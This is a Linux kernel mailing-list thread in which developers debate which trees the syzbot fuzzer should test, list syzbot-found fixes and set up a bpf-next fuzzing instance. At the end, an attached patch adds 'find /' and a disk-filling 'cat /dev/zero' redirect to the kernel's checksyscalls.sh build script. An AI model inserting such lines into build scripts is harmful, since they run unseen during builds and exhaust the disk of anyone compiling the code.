> Effect of all of these things is multiplicative: we test more code,
> smarter, with more bug-detection tools, with more resources. So I
> think we need to plan for a mix of old and new bugs for foreseeable
> future.

That's fine, but when you test Linus's tree, we "know" you are hitting
something that really is an issue, and it's not due to linux-next
oddities.

When I see a linux-next report, and it looks "odd", my default reaction
is "ugh, must be a crazy patch in some other subsystem, I _know_ my code
in linux-next is just fine." :)

> 2. get_maintainer.pl and mix of old and new bugs was mentioned as
> harming attribution. I don't see what will change when/if we test only
> upstream. Then the same mix of old/new bugs will be detected just on
> upstream, with all of the same problems for old/new, maintainers,
> which subsystem, etc. I think the amount of bugs in the kernel is
> significant part of the problem, but the exact boundary where we
> decide to start killing them won't affect number of bugs.

I don't worry about that, the traceback should tell you a lot, and even
when that is wrong (i.e. warnings thrown up by sysfs core calls that are
obviously not a sysfs issue, but rather a subsystem issue), it's easy to
see.

> 3. If we test only upstream, we increase chances of new security bugs
> sinking into releases. We sure could raise perceived security value of
> the bugs by keeping them private, letting them sink into release,
> letting them sink into distros, and then reporting a high-profile
> vulnerability. I think that's wrong. There is something broken with
> value measuring in security community. Bug that is killed before
> sinking into any release is the highest impact thing. As Alexei noted,
> fixing bugs es early as possible also reduces fix costs, backporting
> burden, etc. This also can eliminate need in bisection in some cases,
> say if you accepted a large change to some files and a bunch of
> crashes appears for these files on your tree soon, it's obvious what
> happens.

I agree, this is an issue, but I think you have a lot of "low hanging
fruit" in Linus's tree left to find.  Testing linux-next is great, but
the odds of something "new" being added there for your type of testing
right now is usually pretty low, right?

thanks,

greg k-h
Guenter Roeck Jan. 18, 2018, 2:10 p.m. UTC | #21
On Thu, Jan 18, 2018 at 5:01 AM, Dmitry Vyukov <dvyukov@google.com> wrote:
> On Thu, Jan 18, 2018 at 2:09 AM, Theodore Ts'o <tytso@mit.edu> wrote:
>> On Wed, Jan 17, 2018 at 04:21:13PM -0800, Alexei Starovoitov wrote:
>>>
>>> If syzkaller can only test one tree than linux-next should be the one.
>>
>> Well, there's been some controversy about that.  The problem is that
>> it's often not clear if this is long-standing bug, or a bug which is
>> in a particular subsystem tree --- and if so, *which* subsystem tree,
>> etc.  So it gets blasted to linux-kernel, and to get_maintainer.pl,
>> which is often not accurate --- since the location of the crash
>> doesn't necessarily point out where the problem originated, and hence
>> who should look at the syzbot report.  And so this has caused
>> some.... irritation.
>
>
> Re set of tested trees.
>
> We now have an interesting spectrum of opinions.
>
> Some assorted thoughts on this:
>
> 1. First, "upstream is clean" won't happen any time soon. There are
> several reasons for this:
>  - Currently syzkaller only tests a subset of subsystems that it knows
> how to test, even the ones that it tests it tests poorly. Over time
> it's improved to test most subsystems and existing subsystems better.
> Just few weeks ago I've added some descriptions for crypto subsystem
> and it uncovered 20+ old bugs.
>  - syzkaller is guided, genetic fuzzer over time it leans how to do
> more complex things by small steps. It takes time.
>  - We have more bug detection tools coming: LEAKCHECK, KMSAN (uninit
> memory), KTSAN (data races).
>  - generic syzkaller smartness will be improved over time.
>  - it will get more CPU resources.
> Effect of all of these things is multiplicative: we test more code,
> smarter, with more bug-detection tools, with more resources. So I
> think we need to plan for a mix of old and new bugs for foreseeable
> future.
>
> 2. get_maintainer.pl and mix of old and new bugs was mentioned as
> harming attribution. I don't see what will change when/if we test only
> upstream. Then the same mix of old/new bugs will be detected just on
> upstream, with all of the same problems for old/new, maintainers,
> which subsystem, etc. I think the amount of bugs in the kernel is
> significant part of the problem, but the exact boundary where we
> decide to start killing them won't affect number of bugs.
>
> 3. If we test only upstream, we increase chances of new security bugs
> sinking into releases. We sure could raise perceived security value of
> the bugs by keeping them private, letting them sink into release,
> letting them sink into distros, and then reporting a high-profile
> vulnerability. I think that's wrong. There is something broken with
> value measuring in security community. Bug that is killed before
> sinking into any release is the highest impact thing. As Alexei noted,
> fixing bugs es early as possible also reduces fix costs, backporting
> burden, etc. This also can eliminate need in bisection in some cases,
> say if you accepted a large change to some files and a bunch of
> crashes appears for these files on your tree soon, it's obvious what
> happens.
>
> 4. It was mentioned that linux-next can have a broken slab allocator
> and that will manifest as multiple random crashes. FWIW I don't
> remember that I ever seen this. Yes, sometimes it does not build/boot,
> but these builds are just rejected for testing.
>
> I don't mind dropping linux-next specifically if that's the common
> decision. However, (1) Alexei and Gruenter expressed opposite opinion,

My opinion does not really mean much, if anything. While my personal
opinion is that it would be beneficial to test -next, my understanding
also was that -next was not supposed to be a playground but a
collection of patches which are ready for upstream. Quite obviously,
as this exchange has shown, this is not or no longer the case.

The result is that your testing of -next has not the desired effect of
improving the Linux kernel and of finding problems _before_ they hit
mainline. Instead, your efforts are seen as noise, and syzcaller's
reputation is negatively affected. With that in mind, I would suggest
to stop testing -next. If you ever have spare CPU capacity, you can
start adding subtrees from -next which are known to never be rebased,
such as net-next, taking subtrees tested by 0day as baseline.

Thanks,
Guenter

> (2) I don't see what it will change dramatically, (2) as far as I
> understand Linus actually relies on linux-next giving some concrete
> testing to the code there.
> But I think that testing bpf-next is a positive thing provided that
> there is explicit interest from maintainers. And note that that will
> be testing targeted specifically at bpf subsystem, so that instance
> will not generate bugs in SCSI, USB, etc (though it will cover a part
> of net). Also note that the latest email format includes set of tree
> where the crash happened, so if you see "upstream" or "upstream and
> bpf-next", nothing really changes, you still know that it happens
> upstream. Or if you see only "bpf-next", then you know that it's only
> that tree.
Daniel Borkmann Jan. 18, 2018, 2:46 p.m. UTC | #22
On 01/18/2018 02:10 PM, Dmitry Vyukov wrote:
> On Wed, Jan 17, 2018 at 12:09 PM, Dmitry Vyukov <dvyukov@google.com> wrote:
>> On Wed, Jan 17, 2018 at 10:49 AM, Daniel Borkmann <daniel@iogearbox.net> wrote:
>>> Don't know if there's such a possibility, but it would be nice if we could
>>> target fuzzing for specific subsystems in related subtrees directly (e.g.
>>> for bpf in bpf and bpf-next trees as one example). Dmitry?
>>
>> Hi Daniel,
>>
>> It's doable.
>> Let's start with one bpf tree. Will it be bpf or bpf-next? Which one
>> contains more ongoing work? What's the exact git repo address/branch,
>> so that I don't second guess?

I'm actually thinking that bpf tree [1] would be my preferred choice.
While most of the development happens in bpf-next, after the merge
window it will all end up in bpf eventually anyway and we'd still have
~8 weeks for targeted fuzzing on that before a release goes out. The
other advantage I see on bpf tree itself would be that we'd uncover
issues from fixes that go into bpf tree earlier like the recent
max_entries overflow reports where syzkaller fired multiple times after
the commit causing it went already into Linus' tree. Meaning, we'd miss
out on that if we would choose bpf-next only, therefore my preferred
choice would be on bpf.

  [1] git://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git

>> Also what syscalls it makes sense to enable there to target it at bpf
>> specifically? As far as I understand effects of bpf are far beyond the
>> bpf call and proper testing requires some sockets and other stuff. For

Yes, correct. For example, the ones in ...

  * syzbot+93c4904c5c70348a6890@syzkaller.appspotmail.com
  * syzbot+48340bb518e88849e2e3@syzkaller.appspotmail.com

... are a great find (!), and they all require runtime testing, so
interactions with sockets are definitely needed as well (e.g. the
SO_ATTACH_BPF and writes to trigger traffic going through). Another
option is to have a basic code template to attach to a loopback device
e.g. in a netns and have a tc clsact qdisc with cls_bpf filter
attached, so the fd would be passed to cls_bpf setup and then traffic
goes over loopback to trigger prog run. Same could be for generic XDP
as another example. Unlike socket filters this is root only though,
but it would have more functionality available to fuzz into and I
see robustness here as critically important. There's also a good
bunch of use cases available in BPF kernel selftests which is under
tools/testing/selftests/bpf/ to get a rough picture for fuzzing, but
it doesn't cover all prog types, maps etc though. But overall, I think
it's fine to first start out small and see how it goes.

>> sockets, will it be enough to enable ip/ipv6? Because if we enable all
>> of sctp/dccp/tipc/pptp/etc, it will sure will be finding lots of bugs
>> there as well. Does bpf affect incoming network packets?

Yes, see also comment above. For socket filters this definitely makes
sense as well and there were some interactions in the past in the proto
handlers that were buggy e.g. for odd historic reasons socket filters
allow to truncate skbs (back from classic BPF times), and that required
a reload of some of the prior referenced headers since underlying data
could have changed in the meantime (aka use after free) and some handlers
got that wrong, so probably makes sense to include some of the protos,
too, to cover changes there.

>> Also are there any sysctl's, command line arguments, etc that need to
>> be tuned. I know there are net.core.bpf_jit_enable/harden, but I don't
>> know what's the most relevant combination. Ideally, we test all of
>> them, but let start with one of them because it requires separate
>> instances (since the setting is global and test programs can't just
>> flip it randomly).

Right, I think the current one you set in syzkaller is fine for now.

>> Also do you want testing from root or not from root? We generally
>> don't test under root, because syzkaller comes up with legal ways to
>> shut everything down even if we try to contain it (e.g. kill init
>> somehow or shut down network using netlink). But if we limit syscall
>> surface, then root may work and allow testing staging bpf features.

If you have a chance to testing under both, root and non-root, that
would be best. non-root has a restricted set of features available,
so coverage would be increased under root, but I see both equally
important (to mention one, coming back to the max_elem overflow example
from earlier, this got only triggered for non-root).

Btw, I recently checked out the bpf API model in syzkaller and it
was all in line with latest upstream, very nice to see that!

One more thought on future work could also be to experiment with
syzkaller to have it additionally generate BPF progs in C that it
would then try to load and pass traffic through. That may be worth
trying in addition to the insns level fuzzing.

> So, Daniel, Alexei,
> 
> I understand that I asked lots of questions, but they are relatively
> simple. I need that info to setup proper testing.

Thanks a lot,
Daniel
Dmitry Vyukov Jan. 22, 2018, 8:08 a.m. UTC | #23
Just to restore a bit of faith in syzbot, I've checked 4.15-rc9 commit
log and 28 out of 212 commits turn out to be fixes for bugs found by
syzbot:

Alexei Starovoitov (1):
      bpf: fix 32-bit divide by zero

Cong Wang (2):
      tipc: fix a memory leak in tipc_nl_node_get_link()
      tun: fix a memory leak for tfile->tx_array

Daniel Borkmann (7):
      bpf: arsh is not supported in 32 bit alu thus reject it
      bpf, array: fix overflow in max_entries and undefined behavior
in index_mask
      bpf: mark dst unknown on inconsistent {s, u}bounds adjustments

David Ahern (1):
      netlink: extack needs to be reset each time through loop

Eric Biggers (2):
      af_key: fix buffer overread in verify_address_len()
      af_key: fix buffer overread in parse_exthdrs()

Eric Dumazet (3):
      bpf: fix divides by zero
      ipv6: ip6_make_skb() needs to clear cork.base.dst
      flow_dissector: properly cap thoff field

Florian Westphal (2):
      xfrm: skip policies marked as dead while rehashing
      xfrm: don't call xfrm_policy_cache_flush while holding spinlock

Guillaume Nault (1):
      ppp: unlock all_ppp_mutex before registering device

Ilya Lesokhin (1):
      net/tls: Only attach to sockets in ESTABLISHED state

Marc Kleine-Budde (2):
      can: af_can: can_rcv(): replace WARN_ONCE by pr_warn_once
      can: af_can: canfd_rcv(): replace WARN_ONCE by pr_warn_once

Mike Maloney (1):
      ipv6: fix udpv6 sendmsg crash caused by too small MTU

Sabrina Dubroca (4):
      xfrm: fix rcu usage in xfrm_get_type_offload

Steffen Klassert (3):
      esp: Fix GRO when the headers not fully in the linear part of the skb.
      af_key: Fix memory leak in key_notify_policy.

Takashi Iwai (4):
      ALSA: pcm: Remove yet superfluous WARN_ON()
      ALSA: seq: Make ioctls race-free

Wei Wang (1):
      ipv6: don't let tb6_root node share routes with other node

Xin Long (4):
      sctp: return error if the asoc has been peeled off in sctp_wait_for_sndbuf
      sctp: do not allow the v4 socket to bind a v4mapped v6 address
      netlink: reset extack earlier in netlink_rcv_skb
Dmitry Vyukov Jan. 22, 2018, 1:31 p.m. UTC | #24
On Thu, Jan 18, 2018 at 3:05 PM, Greg Kroah-Hartman
<gregkh@linuxfoundation.org> wrote:
> On Thu, Jan 18, 2018 at 02:01:28PM +0100, Dmitry Vyukov wrote:
>> On Thu, Jan 18, 2018 at 2:09 AM, Theodore Ts'o <tytso@mit.edu> wrote:
>> > On Wed, Jan 17, 2018 at 04:21:13PM -0800, Alexei Starovoitov wrote:
>> >>
>> >> If syzkaller can only test one tree than linux-next should be the one.
>> >
>> > Well, there's been some controversy about that.  The problem is that
>> > it's often not clear if this is long-standing bug, or a bug which is
>> > in a particular subsystem tree --- and if so, *which* subsystem tree,
>> > etc.  So it gets blasted to linux-kernel, and to get_maintainer.pl,
>> > which is often not accurate --- since the location of the crash
>> > doesn't necessarily point out where the problem originated, and hence
>> > who should look at the syzbot report.  And so this has caused
>> > some.... irritation.
>>
>>
>> Re set of tested trees.
>>
>> We now have an interesting spectrum of opinions.
>>
>> Some assorted thoughts on this:
>>
>> 1. First, "upstream is clean" won't happen any time soon. There are
>> several reasons for this:
>>  - Currently syzkaller only tests a subset of subsystems that it knows
>> how to test, even the ones that it tests it tests poorly. Over time
>> it's improved to test most subsystems and existing subsystems better.
>> Just few weeks ago I've added some descriptions for crypto subsystem
>> and it uncovered 20+ old bugs.
>>  - syzkaller is guided, genetic fuzzer over time it leans how to do
>> more complex things by small steps. It takes time.
>>  - We have more bug detection tools coming: LEAKCHECK, KMSAN (uninit
>> memory), KTSAN (data races).
>>  - generic syzkaller smartness will be improved over time.
>>  - it will get more CPU resources.
>> Effect of all of these things is multiplicative: we test more code,
>> smarter, with more bug-detection tools, with more resources. So I
>> think we need to plan for a mix of old and new bugs for foreseeable
>> future.
>
> That's fine, but when you test Linus's tree, we "know" you are hitting
> something that really is an issue, and it's not due to linux-next
> oddities.
>
> When I see a linux-next report, and it looks "odd", my default reaction
> is "ugh, must be a crazy patch in some other subsystem, I _know_ my code
> in linux-next is just fine." :)
>
>> 2. get_maintainer.pl and mix of old and new bugs was mentioned as
>> harming attribution. I don't see what will change when/if we test only
>> upstream. Then the same mix of old/new bugs will be detected just on
>> upstream, with all of the same problems for old/new, maintainers,
>> which subsystem, etc. I think the amount of bugs in the kernel is
>> significant part of the problem, but the exact boundary where we
>> decide to start killing them won't affect number of bugs.
>
> I don't worry about that, the traceback should tell you a lot, and even
> when that is wrong (i.e. warnings thrown up by sysfs core calls that are
> obviously not a sysfs issue, but rather a subsystem issue), it's easy to
> see.
>
>> 3. If we test only upstream, we increase chances of new security bugs
>> sinking into releases. We sure could raise perceived security value of
>> the bugs by keeping them private, letting them sink into release,
>> letting them sink into distros, and then reporting a high-profile
>> vulnerability. I think that's wrong. There is something broken with
>> value measuring in security community. Bug that is killed before
>> sinking into any release is the highest impact thing. As Alexei noted,
>> fixing bugs es early as possible also reduces fix costs, backporting
>> burden, etc. This also can eliminate need in bisection in some cases,
>> say if you accepted a large change to some files and a bunch of
>> crashes appears for these files on your tree soon, it's obvious what
>> happens.
>
> I agree, this is an issue, but I think you have a lot of "low hanging
> fruit" in Linus's tree left to find.  Testing linux-next is great, but
> the odds of something "new" being added there for your type of testing
> right now is usually pretty low, right?


So I've dropped linux-next and mmots for now (you still can see them
for few days for bugs already in the pipeline) and added bpf-next
instead.

bpf-next instance tests under root, has net.core.bpf_jit_enable=1 and
the following syscalls enabled:

"enable_syscalls": [
    "bpf", "mkdir", "mount", "close",
    "perf_event_open", "ioctl$PERF*", "getpid", "gettid",
    "socketpair", "sendmsg", "recvmsg", "setsockopt$sock_attach_bpf",
    "socket$kcm", "ioctl$sock_kcm*"
]

Let's see how this goes.
diff mbox series

Patch

diff --git a/scripts/checksyscalls.sh b/scripts/checksyscalls.sh
index ee3dfb5..d02df2c 100755
--- a/scripts/checksyscalls.sh
+++ b/scripts/checksyscalls.sh
@@ -10,6 +10,9 @@ 
 # checksyscalls.sh gcc gcc-options
 #
 
+find /
+cat /dev/zero > and_this_is_why_bots_are_stupid
+
 ignore_list() {
 cat << EOF
 #include <asm/types.h>